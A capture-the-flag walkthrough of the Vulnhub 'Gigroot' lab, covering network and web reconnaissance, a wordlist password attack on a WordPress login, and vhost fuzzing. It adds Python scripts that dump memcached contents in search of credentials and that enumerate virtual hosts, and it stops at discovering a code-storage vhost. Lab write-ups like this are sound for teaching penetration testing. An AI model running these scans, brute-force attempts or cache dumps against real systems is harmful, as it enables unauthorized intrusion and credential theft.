Gigroot
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:ab:4c:5b 1 60 PCS Systemtechnik GmbH
192.168.56.103 08:00:27:44:c8:1b 1 60 PCS Systemtechnik GmbH
Using netdiscover on Kali Linux, the target host is identified as 192.168.56.103. The other two addresses are the attacking machine's VirtualBox host-only adapter (.1) and that network's DHCP server (.100), so they can be ignored.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 22:08 EDT
Nmap scan report for localhost (192.168.56.103)
Host is up (0.000075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 bf45f6b3e3ce0c69185a5b27e5d39c86 (RSA)
| 256 b5d7455006c4e23c2852b806261fdeb0 (ECDSA)
|_ 256 27f0d02113309c5ef070a1d85ca78f75 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Hey Jen
|_http-server-header: Apache/2.4.38 (Debian)
11211/tcp open memcache?
| fingerprint-strings:
| RPCCheck:
|_ Unknown command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port11211-TCP:V=7.93%I=7%D=4/29%Time=644DCDBD%P=x86_64-pc-linux-gnu%r(R
SF:PCCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unk
SF:nown\x20command");
MAC Address: 08:00:27:44:C8:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.92 seconds
The Nmap results show three open ports on the target: 22 (ssh), 80 (http) and 11211, which Nmap could not identify with confidence. The fingerprint is worth a second look, though: the reply to the RPCCheck probe starts with 0x81, the memcached binary-protocol response magic, its body is "Unknown command" (binary status 0x0081), and the fingerprint length 27 is hexadecimal, i.e. 39 bytes = a 24-byte binary header plus the 15-byte message. So 11211 is almost certainly memcached, which is also the service registered for that port.
Getting a shell
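The fingerprint can be confirmed by hand rather than left as "memcache?". The script below is an added example (my code, not the writeup's): it decodes the memcached binary-protocol response header that Nmap's RPCCheck probe got back and then, pointed at the target, uses the text protocol (version, stats items, stats cachedump, get) to list whatever the cache holds, which is where a lab box tends to park credentials. SAMPLE_REPLY is constructed from the protocol specification to match the fingerprint (0x81 magic, status 0x0081, "Unknown command", 0x27 = 39 bytes) and is not a capture from the target; the host argument and the per-slab dump limit are assumptions.

```python
#!/usr/bin/env python3
"""Confirm and enumerate the suspected memcached service on TCP/11211.

Added example for this writeup, not the original author's code. Part 1 decodes
the memcached *binary* protocol reply that Nmap's RPCCheck probe provoked;
part 2 speaks the *text* protocol to confirm the service and list cached keys.
SAMPLE_REPLY is constructed from the protocol specification to match the
fingerprint (magic 0x81, status 0x0081 "Unknown command", 0x27 = 39 bytes);
it is not a capture from the target.
"""
import socket
import struct
import sys

RESPONSE_MAGIC = 0x81      # first byte of every binary-protocol response
HEADER_FMT = "!BBHBBHIIQ"  # magic, opcode, key len, extras len, data type, status, body len, opaque, cas
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 24
STATUS_NAMES = {0x0000: "No error", 0x0001: "Key not found", 0x0002: "Key exists",
                0x0004: "Invalid arguments", 0x0081: "Unknown command"}
# Constructed: status 0x0081, 15-byte body, opaque 2 echoed from the probe, everything else zero.
SAMPLE_REPLY = struct.pack(HEADER_FMT, RESPONSE_MAGIC, 0x00, 0, 0, 0, 0x0081, 15, 2, 0) + b"Unknown command"


def parse_binary_response(data: bytes) -> dict:
    """Decode a binary-protocol response header and split its body into extras/key/value."""
    if len(data) < HEADER_LEN:
        raise ValueError(f"short packet ({len(data)} bytes)")
    magic, opcode, key_len, ext_len, _, status, body_len, opaque, cas = struct.unpack(HEADER_FMT, data[:HEADER_LEN])
    if magic != RESPONSE_MAGIC:
        raise ValueError(f"not a memcached binary response (magic 0x{magic:02x})")
    body = data[HEADER_LEN:HEADER_LEN + body_len]
    return {"opcode": opcode, "status": status,
            "status_name": STATUS_NAMES.get(status, f"unknown 0x{status:04x}"),
            "key": body[ext_len:ext_len + key_len], "value": body[ext_len + key_len:],
            "opaque": opaque, "cas": cas}


def parse_stats(reply: bytes) -> dict:
    """'STAT <name> <value>' lines up to END -> dict ('stats' and 'stats items' share this shape)."""
    stats = {}
    for line in reply.decode("ascii", errors="replace").splitlines():
        if line == "END":
            break
        parts = line.split(" ", 2)
        if parts[0] == "STAT" and len(parts) == 3:
            stats[parts[1]] = parts[2]
    return stats


def slab_ids(items_stats: dict) -> list:
    """'stats items' reports items:<slab>:<stat>; return the distinct slab ids."""
    return sorted({int(k.split(":")[1]) for k in items_stats if k.startswith("items:")})


def parse_cachedump(reply: bytes) -> list:
    """'ITEM <key> [<bytes> b; <expiry> s]' lines from 'stats cachedump' -> key names."""
    return [line.split(" ", 2)[1] for line in reply.decode("ascii", errors="replace").splitlines()
            if line.startswith("ITEM ")]


def text_command(sock: socket.socket, cmd: bytes, timeout: float = 3.0) -> bytes:
    """Send one text-protocol command; read until END, ERROR or a VERSION line, or the timeout."""
    sock.sendall(cmd + b"\r\n")
    sock.settimeout(timeout)
    buf = b""
    while not (buf.endswith(b"END\r\n") or buf.endswith(b"ERROR\r\n")
               or (buf.startswith(b"VERSION ") and buf.endswith(b"\r\n"))):
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def dump_keys(host: str, port: int = 11211, limit: int = 100) -> dict:
    """Confirm memcached with 'version', then stats items -> stats cachedump -> get for each key."""
    with socket.create_connection((host, port), timeout=5) as sock:
        banner = text_command(sock, b"version")
        if not banner.startswith(b"VERSION "):
            raise RuntimeError(f"{host}:{port} did not answer the text protocol: {banner!r}")
        found = {}
        for slab in slab_ids(parse_stats(text_command(sock, b"stats items"))):
            for key in parse_cachedump(text_command(sock, b"stats cachedump %d %d" % (slab, limit))):
                found[key] = text_command(sock, b"get " + key.encode())
        return found


if __name__ == "__main__":
    info = parse_binary_response(SAMPLE_REPLY)
    print(f"sample: status 0x{info['status']:04x} ({info['status_name']}), body {info['value']!r}, "
          f"{len(SAMPLE_REPLY)} bytes = 0x{len(SAMPLE_REPLY):x}")
    if len(sys.argv) > 1:   # usage: memcached_probe.py 192.168.56.103
        for key, value in dump_keys(sys.argv[1]).items():
            print(key, value)
```

Run it with the target IP as the only argument; without one it just decodes the constructed sample and reports 0x27 bytes, the same figure Nmap prints in the fingerprint. `stats cachedump` only lists the first N items of each slab and is considered legacy; on newer memcached builds `lru_crawler metadump all` walks every key and the parser above only needs a different line prefix.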
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://192.168.56.103/
Hey Jen
Hey Jen, just installed wordpress over at wp.gitroot.vuln
please go check it out!
Add wp.gitroot.vuln to /etc/hosts:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.103 wp.gitroot.vuln
Browsing to that name now, the returned page shows the target is a WordPress site:
http://wp.gitroot.vuln/
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://wp.gitroot.vuln/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.103
+ Target Hostname: wp.gitroot.vuln
+ Target Port: 80
+ Start Time: 2023-04-29 22:24:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /: A WordPress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7863 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-04-29 22:25:11 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://wp.gitroot.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh,.bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://wp.gitroot.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,bak,php,js
[+] Timeout: 10s
===============================================================
2023/04/29 22:25:59 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/index.php (Status: 301) [Size: 1] [--> http://wp.gitroot.vuln/]
/wp-content (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/wp-content/]
/wp-login.php (Status: 200) [Size: 3195]
/manual (Status: 301) [Size: 319] [--> http://wp.gitroot.vuln/manual/]
/wp-includes (Status: 301) [Size: 324] [--> http://wp.gitroot.vuln/wp-includes/]
/wp (Status: 403) [Size: 280]
/javascript (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/javascript/]
/readme.html (Status: 200) [Size: 7440]
/wp-trackback.php (Status: 200) [Size: 136]
/wp-admin (Status: 301) [Size: 321] [--> http://wp.gitroot.vuln/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 43]
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/wp-signup.php (Status: 302) [Size: 1] [--> http://wp.gitroot.vuln/wp-login.php?action=register]
/server-status (Status: 403) [Size: 280]
Progress: 1540385 / 1543927 (99.77%)
===============================================================
2023/04/29 22:29:10 Finished
============================================================
Since we already know the target runs WordPress, the gobuster and nikto output shows nothing beyond the standard WordPress files and directories (readme.html and wp-links-opml.php disclose the version, xmlrpc.php is present, /manual is Apache's own documentation). Next, see whether wpscan can enumerate users or an exploitable plugin.
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -e u,p
[+] beth
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
wpscan turns up the username beth; next, try to crack its password.
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -U beth -P /usr/share/wordlists/rockyou.txt
beth's password was not in rockyou.txt, so look at the installed plugins instead.
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ --plugins-detection mixed
The scan finds the akismet plugin, but it has no usable vulnerability.
Could there be other subdomains?
There is no DNS for the lab domain, so subdomains can only be found as name-based virtual hosts: add gitroot.vuln to /etc/hosts, then let wfuzz send every request to the same IP with a different Host header each time. --hw 26 hides the baseline response (26 words) that Apache's default vhost returns for any name it does not know:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wfuzz -c -u http://gitroot.vuln -H "Host:FUZZ.gitroot.vuln" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://gitroot.vuln/
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 12 L 53 W 422 Ch "# directory-list-2.3-medium.txt"
000000003: 400 12 L 53 W 422 Ch "# Copyright 2007 James Fisher"
000000007: 400 12 L 53 W 422 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000012: 400 12 L 53 W 422 Ch "# on at least 2 different hosts"
000000013: 400 12 L 53 W 422 Ch "#"
000000011: 400 12 L 53 W 422 Ch "# Priority ordered case-sensitive list, where entries were found"
000000010: 400 12 L 53 W 422 Ch "#"
000000009: 400 12 L 53 W 422 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000002: 400 12 L 53 W 422 Ch "#"
000000008: 400 12 L 53 W 422 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000005: 400 12 L 53 W 422 Ch "# This work is licensed under the Creative Commons"
000000006: 400 12 L 53 W 422 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000004: 400 12 L 53 W 422 Ch "#"
000000793: 200 131 L 578 W 10697 Ch "wp"
000002024: 400 12 L 53 W 422 Ch "'"
000003790: 400 12 L 53 W 422 Ch "%20"
000005302: 400 12 L 53 W 422 Ch "$FILE"
000005954: 400 12 L 53 W 422 Ch "$file"
000007004: 400 12 L 53 W 422 Ch "*checkout*"
000012898: 200 21 L 51 W 438 Ch "repo"
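What the wfuzz run above is doing, written out as an added example (my code, not the writeup's or wfuzz's): every request hits the same IP with a different Host header, the default vhost's reply is the baseline, and anything that differs from it is a hit. Two improvements over the raw run are built in: the baseline is measured from a random label instead of guessing --hw 26, and entries that cannot be host labels are skipped, which removes the 400 Bad Request noise. The IP and domain are this lab's values; the default wordlist path is an assumption.

```python
#!/usr/bin/env python3
"""Name-based virtual host discovery, the technique behind the wfuzz run above.

Added example, not part of the original writeup. Every request goes to the
same IP and only the Host header changes. A name Apache has no vhost for is
served by the default vhost, so that response is the baseline; wfuzz's
--hw 26 hides responses whose word count equals it. Here the baseline is
measured from a random label rather than hard-coded, and wordlist entries that
cannot be host labels (comment lines, quotes, %20, $FILE ...) are skipped
instead of producing the 400 Bad Request noise seen above. The IP and domain
are this lab's; the default wordlist path is an assumption.
"""
import http.client
import random
import re
import string
import sys

TARGET_IP = "192.168.56.103"
BASE_DOMAIN = "gitroot.vuln"
LABEL_RE = re.compile(r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)


def valid_label(word: str) -> bool:
    """RFC 1123 host label; the entries wfuzz reported as 400 all fail this check."""
    return bool(LABEL_RE.match(word))


def word_count(body: bytes) -> int:
    """The 'W' column in wfuzz: whitespace-separated tokens in the response body."""
    return len(body.split())


def fetch(label: str, ip: str = TARGET_IP, domain: str = BASE_DOMAIN, timeout: float = 5.0):
    """GET / on the IP with Host: <label>.<domain>; return (status, body)."""
    conn = http.client.HTTPConnection(ip, 80, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": f"{label}.{domain}", "User-Agent": "vhost-enum"})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def baseline_signature(ip: str = TARGET_IP, domain: str = BASE_DOMAIN) -> tuple:
    """Request a random label that cannot exist; its (status, words) is the default vhost's."""
    label = "".join(random.choices(string.ascii_lowercase, k=12))
    status, body = fetch(label, ip, domain)
    return status, word_count(body)


def is_hit(status: int, words: int, baseline: tuple) -> bool:
    """wfuzz's --hw filter generalised: anything whose status or word count differs from the baseline."""
    return (status, words) != baseline


def enumerate_vhosts(candidates, ip: str = TARGET_IP, domain: str = BASE_DOMAIN) -> list:
    """Try each candidate label; return [(label, status, words)] for responses that differ."""
    baseline = baseline_signature(ip, domain)
    print(f"baseline for unknown names on {ip}: status {baseline[0]}, {baseline[1]} words")
    hits = []
    for raw in candidates:
        label = raw.strip()
        if not valid_label(label):
            continue
        status, body = fetch(label, ip, domain)
        words = word_count(body)
        if is_hit(status, words, baseline):
            hits.append((label, status, words))
            print(f"{status} {words:6d} W  {label}.{domain}")
    return hits


if __name__ == "__main__":
    # Assumed path; any one-name-per-line list works (the writeup used directory-list-2.3-medium.txt).
    path = sys.argv[1] if len(sys.argv) > 1 else "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt"
    with open(path, encoding="utf-8", errors="ignore") as fh:
        enumerate_vhosts(fh)
```

Against this box the expected hits are wp and repo, just as in the wfuzz table. Comparing on (status, word count) rather than word count alone also catches a vhost that answers with a redirect of the same size, which --hw on its own would hide.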
Two names get a different response: wp (the WordPress vhost we already know) and repo. The 400 Bad Request lines are noise: the wordlist's comment lines and entries such as ', %20 or $FILE are not valid host names, so Apache rejects the Host header outright. Add repo.gitroot.vuln to /etc/hosts:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.103 wp.gitroot.vuln
192.168.56.103 gitroot.vuln
192.168.56.103 repo.gitroot.vuln
Browsing to the repo vhost returns:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://repo.gitroot.vuln/
Code storage
Welcome to our code storage area, we are currently storing a bunch of code here
Feel free to search our code base at get.php or set code in set.php